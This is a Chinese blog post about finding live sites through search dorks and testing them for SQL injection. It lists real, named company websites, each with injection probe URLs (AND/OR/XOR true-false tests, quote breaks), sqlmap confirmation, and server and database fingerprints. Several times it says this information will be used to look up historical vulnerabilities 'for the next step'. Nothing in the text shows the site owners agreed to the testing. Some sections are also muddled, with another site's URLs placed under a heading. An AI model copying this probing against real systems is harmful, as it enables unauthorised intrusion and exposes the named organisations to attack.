首页 > 其他分享 >记一次实战案例

记一次实战案例

时间:2023-11-16 22:06:48浏览次数:27  
标签:实战 www 一次 http 案例 asp php com id

1、目标:inurl:news.php?id=
URL:https://www.lghk.com/news.php?id=5

网站标题:趋时珠宝首饰有限公司

手工基础判断:

And用法

and 1=1: 这个条件始终是为真的, 也就是说, 存在SQL注入的话, 这个and 1=1的返回结果必定是和正常页面时是完全一致的

and 1=2返回为假, 会强行吧整个查询条件建立成假. 导致查询无数据, 因此页面内容会和正常页面不同.

原始网页:https://www.lghk.com/news.php?id=5

构造url1:https://www.lghk.com/news.php?id=5 AND 1=1

     ![6886fcc875aa1bdb9d5ed88e3c80e1ee_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png](/i/li/?n=2&i=images/202311/4109571782834d4931689368a108a91da68d96.png?,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)

构造url2:https://www.lghk.com/news.php?id=5 AND 1=2

dc253f09b10ef82cccb89a8e2adaa3b4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

如果url1访问结果跟原始网页一致,而url2跟原始网页不一致,有出错信息或者显示内容不一致,则证明存在SQL注入。

or用法:只要有一个为真,那么整条语句都是真

构造url1:https://www.lghk.com/news.php?id=5 or 1=1 正常页面只有News(会显示News, Awards & Cert.)

构造url2:https://www.lghk.com/news.php?id=5 or 1=2 正常页面只有News(会显示News, Awards & Cert.)

0dfe0199ff3c76b11f973a053147512a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

xor用法:同为真同为假,那就是假;一真一假才为真

构造url1:https://www.lghk.com/news.php?id=5 xor 1=1 (显示正常,全部数据都给)

构造url2:https://www.lghk.com/news.php?id=5 xor 1=2 (显示正常,全部数据都给)

字符串类型判断

单引号

构造url1:https://www.lghk.com/news.php?id=5’ (输入单引号会显示报错,后端代码可能有问题 )

96e2946885478825ce0cadc1b80defb4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

双引号

构造url1:https://www.lghk.com/news.php?id=”5”(显示页面正常 )

6863db5be9f191a2aaeee9a73627e925_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在多种注入,可以看到这个网站的应用信息,web应用技术:Nginx,PHP 7.4.33

后端DBMS:MySQL>=5.0(MariaDB fork)

abcd698bf32631f92c9f8619b9cc6ef2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2、目标:inurl:news.php?id=
URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

20a390bff33c9c6b677aacbc815c8a8a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 AND+1=2 (显示报错页面这通常表示可能存在 SQL 注入漏洞)

701a9c33618da008ba653dbff38a4f03_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 (显示1的页面,页面页发生了变化)

字符串类型判断

单引号

构造url1:https://www.lghk.com/news.php?id=5’ (输入单引号会显示报错,后端代码可能有问题 )

c5e24ba7f21848e8bba70c1ff70928bb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=2 (页面没发生变化)

1ef8bbb80bfdea6e79018c33adf1e7b7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

xor用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=1 (显示1的页面,页面页发生了变化)

c5e24ba7f21848e8bba70c1ff70928bb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.xiatech.com.cn/aboutus.asp?id=3 xor+1=2 (页面没发生了变化)

1ef8bbb80bfdea6e79018c33adf1e7b7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

字符串类型判断

单引号

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3’ (输入单引号会显示报错,后端代码可能有问题 )

eefef2c0e979e0f2eaf2d74cb16a8b40_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png双引号

构造url1:http://www.xiatech.com.cn/aboutus.asp?”id=”5”(显示错误 )

726cd617638faa97dd8a601cbd3b1125_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

c6aba6c69c91089d45e4506897bca608_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

abcd698bf32631f92c9f8619b9cc6ef2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3、目标:inurl:news.php?id=
URL:http://www.xiatech.com.cn/aboutus.asp?id=3

网站标题:西安夏溪科技

手工基础判断:

And用法

构造url1:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

ce3dec1ba4e939ea43bf1687c9027fdb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

or用法

构造url1:http://www.xiatech.com.cn/aboutus.asp?id=3 or+1=1 or 1+=2(页面显示正常)

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 2012 r2 or 8.1

中间件是 PHP 5.4.45, Microsoft IIS 8.5

数据库是MySQL5.0

(知道这些信息我们可以查找历史漏洞进行下一步操作)

ad3b3d4b7831bdf07f466f7c3ae7366a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4、目标:inurl:asp?id=
URL:http://www.jgbr.com.cn/ShowProduct.asp?ID=217

网站标题:江苏力星通用钢球股份有限公司

手工基础判断:

And用法

构造url1:http://www.jgbr.com.cn/ShowProduct.asp?ID=217 AND+1=1 (显示空白页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.jialun.com/product/show.php?id=10&bk_id=12 AND+1=2(报错页面)

2ecd5d6d039af54596305b1a78f02709_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

操作系统Windows7 or2008r2

中间件是 iis 7.5

(知道这些信息我们可以查找历史漏洞进行下一步操作)

3828108be1f1e2592670134c73f37032_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5、目标:inurl:asp?id=
URL:http://www.hosen.cn/product.php?pid=500

网站标题:南京浩晃科技有限公司

手工基础判断:

And用法

构造url1:http://www.hosen.cn/product.php?pid=500 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

3d9cb68128bfcf0bad7bf21e5ccac498_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.hosen.cn/product.php?pid=500 AND+1=2 (报错页面可能存在 SQL 注入漏洞)

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

网站信息:PHP 5.4.26, Nginx

(知道这些信息我们可以查找历史漏洞进行下一步操作)

06de72caafc00687e0782340052684e3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

6、目标:inurl:asp?id=
URL:http://www.cuc-china.net/about.asp?id=124

网站标题:世优认证 (上海)有限公司

手工基础判断:

And用法

构造url1:http://www.cuc-china.net/about.asp?id=124 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

c5f8732862d0b95f40a64d03d6c8f409_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.cuc-china.net/about.asp?id=124 AND+1=2(报错页面可能存在 SQL 注入漏洞)

aa9dfb76deb2dd2b6933bea714ec21da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 7或2008 R2

web应用技术:Microsoft IIS 7.5、ASP、ASP。NET

后端DBMS:Microsoft Access (知道这些信息我们可以查找历史漏洞进行下一步操作)

dded5e01fd57844dc62113a9ccd496e0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

7、目标:inurl:asp?id=
URL:http://www.ywbaili.com/news.php?id=1

网站标题:百利飞镖

手工基础判断:

And用法

构造url1:http://www.ywbaili.com/news.php?id=1 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

94bceca2cf401727fc776a0bd816e471_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

a12e6e97b188135e139cf3c357091ba7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows XP或2003

web应用技术:ASP.NET、Microsoft IIS 6.0

后端DBMS:MySQL>=5.0.12(知道这些信息我们可以查找历史漏洞进行下一步操作)

59ebbbb4e7f61446136b153647791615_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

8、目标:inurl:news.php?id=
URL:https://www.szdwwy.com/service_show.php?id=2

网站标题:东吴服务产业集团 (江苏) 有限公司

And用法

构造url1:https://www.szdwwy.com/service_show.php?id=2 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.ywbaili.com/news.php?id=1 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

ad5228ed45a2d3c5534457d1945abaa5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

后端DBMS是MySQL

web应用程序技术:Apache

后端DBMS:MySQL>=5.0.12

(知道这些信息我们可以查找历史漏洞进行下一步操作)

8e07e7be4a29679b706454c4a2d6bfb2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

9、目标:inurl:news.php?id=
URL:http://www.icet.org.cn/news.asp?id=367

网站标题:能源与交通创新中心

And用法

构造url1:http://www.icet.org.cn/news.asp?id=367 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.icet.org.cn/news.asp?id=367 AND+1=2 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

7f89b5223bf1cdcf26b8f5988da37d36_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows 2012或8

web应用程序技术:Microsoft IIS 8.0、ASP.NET、ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

0dcb1f0872e5ab86567fc1943bff5d6f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

10、目标:inurl:band_info.php?id=
URL:http://www.fine-stamping.com/contact.asp?id=10

网站标题:苏州范斯特机械科技有限公司

And用法

构造url1:http://www.fine-stamping.com/contact.asp?id=10 AND+1=1 (显示正常页面这通常表示可能存在 SQL 注入漏洞)

构造url2:http://www.fine-stamping.com/contact.asp?id=10 AND+1=2(显示正常页面这通常表示可能存在 SQL 注入漏洞)

字节符

构造url2:http://www.fine-stamping.com/contact.asp?id=10’(显示报错)

f3add07bb18ceca7ea7676820246ca66_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

Sqlmap检测:使用工具来跑可以看到存在sql注入,可以看到这个网站的应用信息

web服务器操作系统:Windows

web应用技术:ASP

后端DBMS:Microsoft Access

(知道这些信息我们可以查找历史漏洞进行下一步操作)

764d2cafcd629727c2235ecdc15540c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

问题:1
URL:http://www.syyqz.com/lianxi.php?pid=6&id=6

手工测试是有漏洞,但是使用sqlmap跑也是有注入点,但是就是跑不出数据库信息

6672a73f91c632d58ed58e5ab8a8d647_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

问题:2
URL:http://www.isriht.com/index.php?id=344

输入了and 1=1 显示下图这样的操作

5334f407249b2d8387f8619d2165b664_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

标签:实战,www,一次,http,案例,asp,php,com,id
From: https://blog.51cto.com/ruogu994/8432029

相关文章

  • HarmonyOS 实战项目
    引言本章将介绍如何在HarmonyOS上进行实际项目开发。我们将从项目需求分析开始,逐步完成项目的设计、开发、测试和上线过程。目录项目需求分析项目设计项目开发项目测试项目上线总结1.项目需求分析项目需求分析是项目开发的关键阶段之一,它有助于确定项目的范围、目......
  • EtherCAT转Modbus网关用Modbus Slave模拟从站配置案例
    兴达易控EtherCAT转Modbus网关可以用作Modbus从站的配置。EtherCAT转Modbus网关允许Modbus协议转换为EtherCAT,实现不同通信系统之间的互操作性。通过配置从站到网关的Modbus,您可以访问和控制Modbus设备。同时,网关还可以扩展Modbus网络的范围,使更多的设备可以连接到网络上。  ......
  • C++调用Python3实战,和PyImport_ImportModule返回NULL问题解决
    LinuxC++调用Python3入门准备以下面的目录结构演示如何在LinuxC/C++调用python3。|--hello.py|--main.cpp|--CMakeLists.txt hello.py:python的脚本,里面有2个函数main.cpp:c++函数CMakeLists.txt:Cmake文件,生成makefilepython脚本示例python脚本hello.py内容如下,......
  • JS逆向实战26——某店ua模拟登陆
    声明本文章中所有内容仅供学习交流,抓包内容、敏感网址、数据接口均已做脱敏处理,严禁用于商业用途和非法用途,否则由此产生的一切后果均与作者无关,若有侵权,请联系我立即删除!目标目标网站aHR0cHM6Ly9kLndlaWRpYW4uY29tL3dlaWRpYW4tcGMvbG9naW4=目标获取登录接口UA参数加密,U......
  • Java编程小案例
    1.不借助第三者实现两个变量值的交换。packagejava_11_9;importjava.util.Scanner;publicclassNumberSwap{ publicstaticvoidmain(String[]args){ @SuppressWarnings("resource") Scannerscanner=newScanner(System.in); System.out.print("请输入a的值:&q......
  • Vue3实战 - 第一章 node.js/npm安装、配置
    一、node.js 安装(windows)1、下载并安装nodehttps://nodejs.org/en安装到 D:\Java\nodes 路径2、配置环境变量检查是否安装成功3、配置全局包存放目录和缓存目录npmconfigsetprefix"D:\nodejs\node_global"npmconfigsetcache"D:\nodejs\node_cache"4、安......
  • skywalking(三) 实现收集基于虚拟机环境dubbo微服务链路跟踪案例
    dubbo微服务架构https://cn.dubbo.apache.org/zh-cn/overview/home/https://help.aliyun.com/zh/edas/developer-reference/dubbo-overview‍1.安装zookeeper注册中心官网:https://zookeeper.apache.org/安装说明:https://zookeeper.apache.org/doc/r3.7.1/zookeeperAdmin.......
  • 西门子HMI第一次下载:由于缺少面板映像,下载失败。请安装缺少的面板映像。请参阅文档
    第一次下载HMI时提示:由于缺少面板映像,下载失败。请安装缺少的面板映像。请参阅文档。 原因:组态时的HMI固件版本与触摸屏实际的版本不相符组态版本:16.0.0.0硬件实际版本:15.1.0.0  查看HMI硬件固件版本:1、点击Settings2、找到......
  • Burpsuite Intruder 暴力破jie实战
    BurpSuite是一款用于攻jiWeb应用程序的集成平台,其中包含了许多工具,其中之一就是Intruder。Intruder是BurpSuite中的一个模块,用于进行暴力破jie攻ji。下面是使用BurpSuiteIntruder进行暴力破jie的步骤:打开BurpSuite并选择要攻ji的目标网站。在BurpSuite中选择Intruder选项卡,然......
  • 第8期ThreadX视频教程:应用实战,将裸机工程移植到RTOS的任务划分,驱动和应用层交互,中断DM
     这个是我们初学RTOS面临的最直接问题,很多时候,简单的RTOS机制明白了,API也会调用了,就是添加到RTOS后,总感觉那里不对劲,怎么使用才是正确姿势。针对这些问题,本期视频教程,我们ThreadX内核教程穿插一期实战应用。使用RTOS要充分发挥其高效的多任务管理机制和实时性,这样也是我们采用RTOS......